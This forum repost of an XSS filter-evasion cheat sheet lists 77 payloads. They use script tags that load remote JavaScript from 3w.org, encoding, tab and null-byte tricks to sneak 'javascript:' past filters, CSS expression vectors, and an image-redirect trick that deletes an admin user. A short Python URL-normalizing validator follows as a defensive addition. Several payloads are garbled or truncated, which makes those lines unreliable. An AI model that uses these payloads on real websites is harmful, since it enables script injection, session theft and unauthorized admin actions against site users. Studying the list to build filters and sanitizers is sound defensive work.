There seems to be relatively little XSS material on t00ls, so I copied this over when I came across something good; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added in front (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS gets filtered, you can place JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; arbitrary commands can be executed
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Original source: http://fuzzexp.org/u/0day/?p=14
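Items 3 to 19 above all defeat a filter that merely checks whether an attribute value starts with "javascript:": case changes, HTML entities with and without semicolons, embedded tab/newline/CR, null bytes and leading control characters are all undone by the browser before it reads the scheme. The following is an added example, not code from the original post or from fuzzexp.org, showing the normalization a server-side validator for URL-valued attributes (SRC, HREF, BACKGROUND) has to perform before it can trust the scheme; it uses only the Python standard library and the sample values are constructed here.

```python
import html
import re
from urllib.parse import urlsplit

# ASCII tab, LF and CR are removed anywhere in a URL before it is parsed,
# which is why the split-up "jav ascript:" vectors (items 11 to 15) still run.
_STRIP_ANYWHERE = re.compile(r"[\t\n\r]")
# Leading C0 controls and space are trimmed before the scheme is read (item 19);
# item 47's list of tolerated prefixes adds NBSP, U+2000..U+2008, U+3000, U+FEFF.
_LEADING_JUNK = re.compile(r"^[\x00-\x20\xa0\u2000-\u2008\u3000\ufeff]+")
_SCRIPT_SCHEME = re.compile(r"^(javascript|vbscript):", re.IGNORECASE)
_ALLOWED_SCHEMES = {"http", "https", ""}  # "" covers relative and //host links


def normalize_url(value: str) -> str:
    """Apply the transformations a browser applies before it reads the scheme."""
    decoded = html.unescape(value)            # &#106; &#x6A; and semicolon-less forms (items 5, 8 to 10)
    decoded = decoded.replace("\x00", "")     # raw null bytes (items 17, 18)
    decoded = _STRIP_ANYWHERE.sub("", decoded)  # embedded tab / newline / carriage return
    return _LEADING_JUNK.sub("", decoded)     # leading space and control characters


def is_script_scheme(value: str) -> bool:
    """True when the normalized value starts with javascript: or vbscript:."""
    return bool(_SCRIPT_SCHEME.match(normalize_url(value)))


def is_allowed_url(value: str) -> bool:
    """Allowlist check: only http, https and relative URLs pass."""
    normalized = normalize_url(value)
    if _SCRIPT_SCHEME.match(normalized):
        return False
    return urlsplit(normalized).scheme.lower() in _ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed samples modelled on the vectors above (not taken from the post).
    samples = [
        "JaVaScRiPt:alert('XSS')",                    # item 4: case variation
        "&#106;&#97;&#118;&#97;script:alert('XSS')",  # item 5: decimal entities
        "&#x6A;avascript:alert('XSS')",               # item 10: hex entity
        "jav\tascript:alert('XSS')",                  # item 11: embedded tab
        "java\x00script:alert('XSS')",                # item 17: null byte
        " &#14; javascript:alert('XSS')",             # item 19: leading control char
        "http://3232235521/",                         # item 70: odd but harmless host
        "//www.google.com/",                          # item 74: protocol-relative
    ]
    for sample in samples:
        print(f"{'ALLOW' if is_allowed_url(sample) else 'BLOCK'}  {sample!r}")
```

This covers URL-valued attributes only; the CSS url()/expression vectors (items 39, 46 to 53) and event-handler attributes (item 21) need contextual output encoding or an allowlist-based HTML sanitizer, not a URL check.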